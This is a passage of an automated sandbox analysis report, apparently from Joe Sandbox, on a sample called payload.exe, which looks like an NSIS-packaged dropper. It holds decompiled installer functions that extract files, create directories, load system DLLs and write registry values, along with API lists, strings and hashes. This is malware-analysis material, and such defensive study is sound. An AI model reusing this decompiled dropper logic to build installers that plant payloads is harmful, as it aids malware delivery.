GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\payload.exe,C:\Users\user\Desktop\payload.exe,80000000,00000003), ref: 00402CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
soft, xrefs: 00402D54
Null, xrefs: 00402D5D
"C:\Users\user\Desktop\payload.exe", xrefs: 00402C66
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
Inst, xrefs: 00402D4B
C:\Users\user\Desktop\payload.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
Error launching installer, xrefs: 00402CB6

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\payload.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\payload.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-3997448683
Opcode ID: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
Instruction ID: 1839f4375b44da3097aca9d4a8c6c84b0463c2d100b7a2d698c12080187f488f
Opcode Fuzzy Hash: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
Instruction Fuzzy Hash: BF51B6B1A41214ABDF109F65DE89B9E7AB4EF00355F14403BF904B62D1C7BC9E418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A3A(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004057D8(_t82);
				_push(_t82);
				_t83 = "Call";
				if(_t33 == 0) {
					lstrcatA(E0040576B(E00405CF9(_t83, "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Chipyard\\reconfiguration")), ??);
				} else {
					E00405CF9();
				}
				E00405F64(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FFD(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405947(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040596C(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F12(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423788;
						goto L32;
					} else {
						E00405CF9(0x409be8, 0x424000);
						E00405CF9(0x424000, _t83);
						E00405D1B(_t75, 0x409be8, _t83, "C:\Users\Albus\AppData\Local\Temp\nsg90FC.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405CF9(0x424000, 0x409be8);
						_t62 = E004054EF("C:\Users\Albus\AppData\Local\Temp\nsg90FC.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423788 =  &( *0x423788->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00404F12();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F12(0xffffffea,  *(_t85 - 8));
				 *0x4237b4 =  *0x4237b4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E9F(); // executed
				 *0x4237b4 =  *0x4237b4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1B(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405D1B(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E004054EF();
					goto L29;
				}
				goto L33;
			}

0x00401751
0x00401758
0x00401761
0x00401764
0x00401767
0x0040176c
0x0040176d
0x00401774
0x00401790
0x00401776
0x00401777
0x00401777
0x00401796
0x004017a0
0x004017a0
0x004017a4
0x004017a7
0x004017ac
0x004017ae
0x004017b0
0x004017b5
0x004017b5
0x004017c0
0x004017c0
0x004017d1
0x004017d3
0x004017d3
0x004017d4
0x004017d4
0x004017d7
0x004017da
0x004017dd
0x004017dd
0x004017e4
0x004017f3
0x004017f8
0x004017fb
0x004017fe
0x00000000
0x00000000
0x00401800
0x00401803
0x0040185d
0x00401862
0x004015a8
0x004026a6
0x004026a6
0x004028cf
0x004028d2
0x004028d2
0x00000000
0x00401805
0x0040180b
0x00401816
0x00401823
0x0040182e
0x00401844
0x00401844
0x00401847
0x00000000
0x0040184d
0x0040184d
0x0040184e
0x0040186b
0x004028d8
0x004028d8
0x004028d8
0x00401850
0x00401850
0x00401851
0x00401492
0x0040226e
0x0040226e
0x0040226e
0x0040184e
0x00401847
0x004028da
0x004028de
0x004028de
0x0040187b
0x00401880
0x00401886
0x00401887
0x00401888
0x0040188b
0x0040188e
0x00401893
0x00401899
0x0040189d
0x0040189f
0x004018a7
0x004018b3
0x004018a1
0x004018a1
0x004018a5
0x00000000
0x00000000
0x004018a5
0x004018bc
0x004018c2
0x004018c4
0x00000000
0x004018ca
0x004018ca
0x004018cd
0x004018e5
0x004018cf
0x004018d2
0x004018db
0x004018db
0x004018ea
0x004018ef
0x00402269
0x00000000
0x00402269
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06

Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FCE

Strings

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration, xrefs: 0040177E
Call, xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll, xrefs: 0040181E, 0040183A

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration$C:\Users\user\AppData\Local\Temp\nsg90FC.tmp$C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll$Call
API String ID: 1941528284-2316224325
Opcode ID: 44ecab9e1ef5e24c1ff596ae454948ee53cb588ab7073804ea6e55edc91cb487
Instruction ID: dfa66b7161a0f16b13ad00a25904a83b243dedeb6ee7557d1be3b523159fd244
Opcode Fuzzy Hash: 44ecab9e1ef5e24c1ff596ae454948ee53cb588ab7073804ea6e55edc91cb487
Instruction Fuzzy Hash: 5641D572910515BACF107BB5CC85EAF3679EF45329B20823BF521F20E2D63C4A419B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004053D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004053D8(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004053e3
0x004053e7
0x004053ea
0x004053f0
0x004053f4
0x004053f8
0x00405400
0x00405407
0x0040540d
0x00405414
0x0040541b
0x00405423
0x00405425
0x00000000
0x00405425
0x0040542f
0x00405436
0x0040544c
0x00000000
0x00000000
0x00000000
0x0040544e
0x00405452

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B
GetLastError.KERNEL32 ref: 0040542F
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405444
GetLastError.KERNEL32 ref: 0040544E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004053FE
C:\Users\user\Desktop, xrefs: 004053D8
ds@, xrefs: 0040540D
ts@, xrefs: 004053DE

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-1618225069
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 5d613d5f07efa900d759e60f8f8ec78c4c71b6ffd2fe208e339ff175f81ef67f
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: F3010871D14259EADF119FA0D9487EFBFB8EB04315F00417AE904B6280D378A644CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406024 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406024(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x0040603b
0x00406044
0x00406046
0x00406046
0x0040604a
0x0040605c
0x00406056
0x00406056
0x00406056
0x00406060
0x00406074
0x00406088
0x0040608f

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
wsprintfA.USER32 ref: 00406074
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088

Strings

\, xrefs: 0040604C
UXTHEME, xrefs: 0040602D
%s%s.dll, xrefs: 0040606E

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: 72752c577983536edbae7b7a4b2c1439e1101fa4b93fa8d0208d5a4e16dde88a
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: E6F0FC30A40109AADB14E764DC0DFEB365CAB09305F140576A546E11D1D578E9258B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402E9F(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				char _v84;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x40e8c0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E00403091( *0x423758 + _t56);
				}
				if(E0040307B( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E0040307B(0x40a8c0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E00405A13(_a8, 0x40a8c0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E0040307B(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406175(0x40a830);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E0040307B(0x40a8c0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40a848 = 0x40a8c0;
						 *0x40a84c = _t92;
						while(1) {
							 *0x40a850 = _t81;
							 *0x40a854 = _v12; // executed
							_t69 = E00406195(0x40a830); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40a850; // 0x40e8c0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x4237b4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v84, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00404F12(0,  &_v84);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40a850; // 0x40e8c0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405A13(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x00402ea7
0x00402eab
0x00402eae
0x00402eb3
0x00402eb5
0x00402eb5
0x00402ebc
0x00402ec0
0x00402ec4
0x00402ec6
0x00402ec6
0x00402ecb
0x00402ed0
0x00402edb
0x00402edb
0x00402eed
0x00403032
0x00403032
0x00000000
0x00402ef3
0x00402ef7
0x0040301d
0x00403066
0x00403037
0x0040303d
0x0040303f
0x0040303f
0x00403050
0x00000000
0x00403052
0x00403057
0x0040305e
0x00403017
0x00403017
0x00403034
0x00403034
0x00000000
0x00403034
0x00403060
0x00403063
0x00000000
0x00403063
0x00403050
0x00403071
0x00000000
0x00403071
0x00403022
0x00403024
0x00403024
0x00403030
0x0040306e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403030
0x00402f08
0x00402f0b
0x00402f10
0x00402f10
0x00402f1a
0x00402f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f23
0x00402f23
0x00402f23
0x00402f2b
0x00402f2d
0x00402f2d
0x00402f3e
0x00000000
0x00000000
0x00402f44
0x00402f47
0x00402f4d
0x00402f53
0x00402f5b
0x00402f61
0x00402f66
0x00402f6d
0x00402f70
0x00000000
0x00000000
0x00402f76
0x00402f7c
0x00402f7e
0x00402f8b
0x00402f8d
0x00402fbb
0x00402fc1
0x00402fca
0x00402fcf
0x00402fcf
0x00402fd4
0x0040300b
0x00000000
0x00000000
0x00000000
0x00402fd6
0x00402fda
0x00402fef
0x00402ff2
0x00402ff5
0x00402ffb
0x00402fff
0x00000000
0x00000000
0x00000000
0x00403005
0x00402fe1
0x00402fe8
0x00000000
0x00000000
0x00402fea
0x00000000
0x00402fea
0x00402fd4
0x00403013
0x00000000
0x00403013
0x00000000
0x00402f23

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EFD
GetTickCount.KERNEL32(0040A8C0,00004000), ref: 00402F7E
MulDiv.KERNEL32 ref: 00402FAB
wsprintfA.USER32 ref: 00402FBB

Strings

... %d%%, xrefs: 00402FB5

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: fb8bdaecb8610db7079700bd5469a99c5e74861b297f6c97a10e9c8668abb65b
Instruction ID: 4ab2a5a1bcd3fb7fa9d72e81aa521510b391fe67da8672e6f00875cd24a8b3cf
Opcode Fuzzy Hash: fb8bdaecb8610db7079700bd5469a99c5e74861b297f6c97a10e9c8668abb65b
Instruction Fuzzy Hash: 7D518F729022199BDF10DF65DA08A9F7BB8AF40795F14413BF800B72C4C7789E51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00402364(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B2F(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A3A(2);
				_t18 = E00402A3A(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x4237b0 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A3A(0x23);
						_t19 = lstrlenA(0x409be8) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A1D(3);
						 *0x409be8 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E9F( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x409be8, 0xc00);
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x409be8, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x423788 =  *0x423788 +  *(_t37 - 4);
				return 0;
			}

0x00402365
0x0040236a
0x00402374
0x0040237e
0x00402381
0x0040239b
0x004023a2
0x004023aa
0x004023b8
0x004023bc
0x004023c7
0x004023c7
0x004023cb
0x004023cf
0x004023d5
0x004023da
0x004023da
0x004023de
0x004023ea
0x004023ea
0x004023fb
0x00402403
0x00402405
0x00402405
0x00402408
0x004024d8
0x004024d8
0x004028d2
0x004028de

APIs

RegCreateKeyExA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 004023A2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg90FC.tmp,00000000), ref: 004023FB
RegCloseKey.KERNEL32(?), ref: 004024D8

Strings

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
